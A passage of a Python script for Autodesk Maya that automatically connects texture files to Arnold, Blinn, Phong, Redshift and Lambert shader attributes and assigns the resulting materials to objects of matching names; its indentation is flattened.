color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i or color_alt_text.lower() in i:
if color_alt_text in i:
cut = i.partition( '_' + color_alt_text)
elif color_alt_text.lower() in i:
cut = i.partition( '_' + color_alt_text.lower())
same_name = False
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt2_text in i or color_alt2_text.lower() in i:
if color_alt2_text in i:
cut = i.partition( '_' + color_alt2_text)
elif color_alt2_text.lower() in i:
cut = i.partition( '_' + color_alt2_text.lower())
same_name = False
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i or roughness_text.lower() in i:
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
elif roughness_text.lower() in i:
cut = i.partition( '_' + roughness_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.specularRoughness'.format(b)):
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i or roughness_alt_text.lower() in i:
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
elif roughness_alt_text.lower() in i:
cut = i.partition( '_' + roughness_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.specularRoughness'.format(b)):
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i or metal_text.lower() in i:
if metal_text in i:
cut = i.partition( '_' + metal_text)
elif metal_text.lower() in i:
cut = i.partition( '_' + metal_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.metalness'.format(b)):
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i or metal_alt_text.lower() in i:
if metal_alt_text in i:
cut = i.partition( '_' + metal_alt_text)
elif metal_alt_text.lower() in i:
cut = i.partition( '_' + metal_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.metalness'.format(b)):
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i or normal_text.lower() in i:
if normal_text in i:
cut = i.partition( '_' + normal_text)
elif normal_text.lower() in i:
cut = i.partition( '_' + normal_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
if not cmds.listConnections('{0}.normalCamera'.format(b)):
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i or scatter_text.lower() in i:
if scatter_text in i:
cut = i.partition( '_' + scatter_text)
elif scatter_text.lower() in i:
cut = i.partition( '_' + scatter_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
if not cmds.listConnections('{0}.subsurface'.format(b)):
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i or emissive_text.lower() in i:
if emissive_text in i:
cut = i.partition( '_' + emissive_text)
elif emissive_text.lower() in i:
cut = i.partition( '_' + emissive_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
if not cmds.listConnections('{0}.emissionColor'.format(b)):
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i or ior_text.lower() in i:
if ior_text in i:
cut = i.partition( '_' + ior_text)
elif ior_text.lower() in i:
cut = i.partition( '_' + ior_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
if not cmds.listConnections('{0}.specularIOR'.format(b)):
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i or opacity_text.lower() in i:
if opacity_text in i:
cut = i.partition( '_' + opacity_text)
elif opacity_text.lower() in i:
cut = i.partition( '_' + opacity_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity'.format(b)):
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if opacity_alt_text in i or opacity_alt_text.lower() in i:
if opacity_alt_text in i:
cut = i.partition( '_' + opacity_alt_text)
elif opacity_alt_text.lower() in i:
cut = i.partition( '_' + opacity_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity'.format(b)):
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls( type = 'file')
if default_shader == blinn:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(type = 'file')
if default_shader == phong:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color', '.transl_color']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_2
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_5
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
global connect_6
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
global connect_7
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
global connect_9
connect_9 = cmds.listConnections(selected_shader2 + my_array[8])
names = cmds.ls( type = 'file')
if default_shader == redshift:
global i
for i in names:
if color_text in i or color_text.lower() in i: #Roughness
if color_text in i:
cut = i.partition( '_Base' + color_text)
elif color_text.lower() in i:
cut = i.partition( '_base' + color_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
global same_name
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i or color_alt_text.lower() in i: #Roughness
if color_alt_text in i:
cut = i.partition( '_' + color_alt_text)
elif color_alt_text.lower() in i:
cut = i.partition( '_' + color_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt2_text in i or color_alt2_text.lower() in i: #Roughness
if color_alt2_text in i:
cut = i.partition( '_' + color_alt2_text)
elif color_alt2_text.lower() in i:
cut = i.partition( '_' + color_alt2_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i or roughness_text.lower() in i: #Roughness
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
elif roughness_text.lower() in i:
cut = i.partition( '_' + roughness_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.refl_roughness'.format(b)):
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if roughness_alt_text in i or roughness_alt_text.lower() in i:
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
elif roughness_alt_text.lower() in i:
cut = i.partition( '_' + roughness_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.refl_roughness'.format(b)):
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if metal_text in i or metal_text.lower() in i:
if metal_text in i:
cut = i.partition( '_' + metal_text)
elif metal_text.lower() in i:
cut = i.partition( '_' + metal_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.refl_metalness'.format(b)):
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i or metal_alt_text.lower() in i:
if metal_alt_text in i:
cut = i.partition( '_' + metal_alt_text)
elif metal_alt_text.lower() in i:
cut = i.partition( '_' + metal_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.refl_metalness'.format(b)):
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i or normal_text.lower() in i:
if normal_text in i:
cut = i.partition( '_' + normal_text)
elif normal_text.lower() in i:
cut = i.partition( '_' + normal_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
if not cmds.listConnections('{0}.bump_input'.format(b)):
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i or scatter_text.lower() in i:
if scatter_text in i:
cut = i.partition( '_' + scatter_text)
elif scatter_text.lower() in i:
cut = i.partition( '_' + scatter_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
if not cmds.listConnections('{0}.ms_amount'.format(b)):
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i or emissive_text.lower() in i:
if emissive_text in i:
cut = i.partition( '_' + emissive_text)
elif emissive_text.lower() in i:
cut = i.partition( '_' + emissive_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
if not cmds.listConnections('{0}.emission_color'.format(b)):
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i or ior_text.lower() in i:
if ior_text in i:
cut = i.partition( '_' + ior_text)
elif ior_text.lower() in i:
cut = i.partition( '_' + ior_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
if not cmds.listConnections('{0}.refl_ior'.format(b)):
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i or opacity_text.lower() in i:
if opacity_text in i:
cut = i.partition( '_' + opacity_text)
elif opacity_text.lower() in i:
cut = i.partition( '_' + opacity_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity_color'.format(b)):
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if opacity_alt_text in i or opacity_alt_text.lower() in i:
if opacity_alt_text in i:
cut = i.partition( '_' + opacity_alt_text)
elif opacity_alt_text.lower() in i:
cut = i.partition( '_' + opacity_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity_color'.format(b)):
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if translucency_text in i or translucency_text.lower() in i:
if translucency_text in i:
cut = i.partition( '_' + translucency_text)
elif translucency_text.lower() in i:
cut = i.partition( '_' + translucency_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.transl_color'.format(b)):
translucency_func2('.transl_color')
if same_name == False:
translucency_func2('.transl_color')
#lambert
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls( type = 'file')
if default_shader == lambert:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
global selected_shader2
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
# Deletes any materials without incoming color connection
counter = 0
global counter
while counter < number_of_shaders:
delete_shader(shaders_list[counter], shaders_color_list[counter])
counter = counter + 1
# assigns objects with the same name as the materials created.
arnold_final_shaders = cmds.ls(type = arnold)
blinn_final_shaders = cmds.ls(type = blinn)
phong_final_shaders = cmds.ls(type = phong)
redshift_final_shaders = cmds.ls(type = redshift)
lambert_final_shaders = cmds.ls(type = lambert)
object_suf_len = len(object_suffix)
object_names = cmds.ls(type = 'transform')
shader_arnold_len = len(arnold_final_shaders)
shader_blinn_len = len(blinn_final_shaders)
shader_phong_len = len(phong_final_shaders)
shader_redshift_len = len(redshift_final_shaders)
shader_lambert_len = len(lambert_final_shaders)
var = 0
if object_material_connect == True:
if default_shader == arnold:
while var < shader_arnold_len:
for b in object_names:
c = arnold_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((arnold_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == blinn:
while var < shader_blinn_len:
for b in object_names:
c = blinn_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((blinn_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == phong:
while var < shader_phong_len:
for b in object_names:
c = phong_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((phong_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == redshift:
while var < shader_redshift_len:
for b in object_names:
c = redshift_final_shaders[var]
d = c.partition(material_suffix)[0]
x = b.lower()
y = d.lower()
if y in x:
test = cmds.listConnections((redshift_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == lambert:
while var < shader_lambert_len:
for b in object_names:
c = lambert_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((lambert_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
def Selected():
if cmds.ls(selection = True, type = 'file'): #If a texture file is selected
#Arnold
if cmds.ls(selection = True, type = 'aiStandardSurface'):#If arnold is selected
global selected_shader
selected_shader = cmds.ls(selection = True, type = 'aiStandardSurface')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
global i
for i in names:
if color_text in i or color_alt_text in i:
color_func('.baseColor')
if roughness_text in i or roughness_alt_text in i:
roughness_func()
if metal_text in i or metal_alt_text in i:
metal_func('.metalness')
if normal_text in i:
normal_func()
if scatter_text in i:
scatter_func('.subsurface')
if emissive_text in i:
emissive_func('.emissionColor')
if ior_text in i or 'Ior' in i or 'IOR' in i:
ior_func('.specularIOR')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity')
#Blinn
elif cmds.ls(selection = True, type = 'blinn'):
global selected_shader
selected_shader = cmds.ls(selection = True, type = 'blinn')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
global i
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#Phong
elif cmds.ls(selection = True, type = 'phong'):
global selected_shader
selected_shader = cmds.ls(selection = True, type = 'phong')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
global i
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#RedshiftMaterial
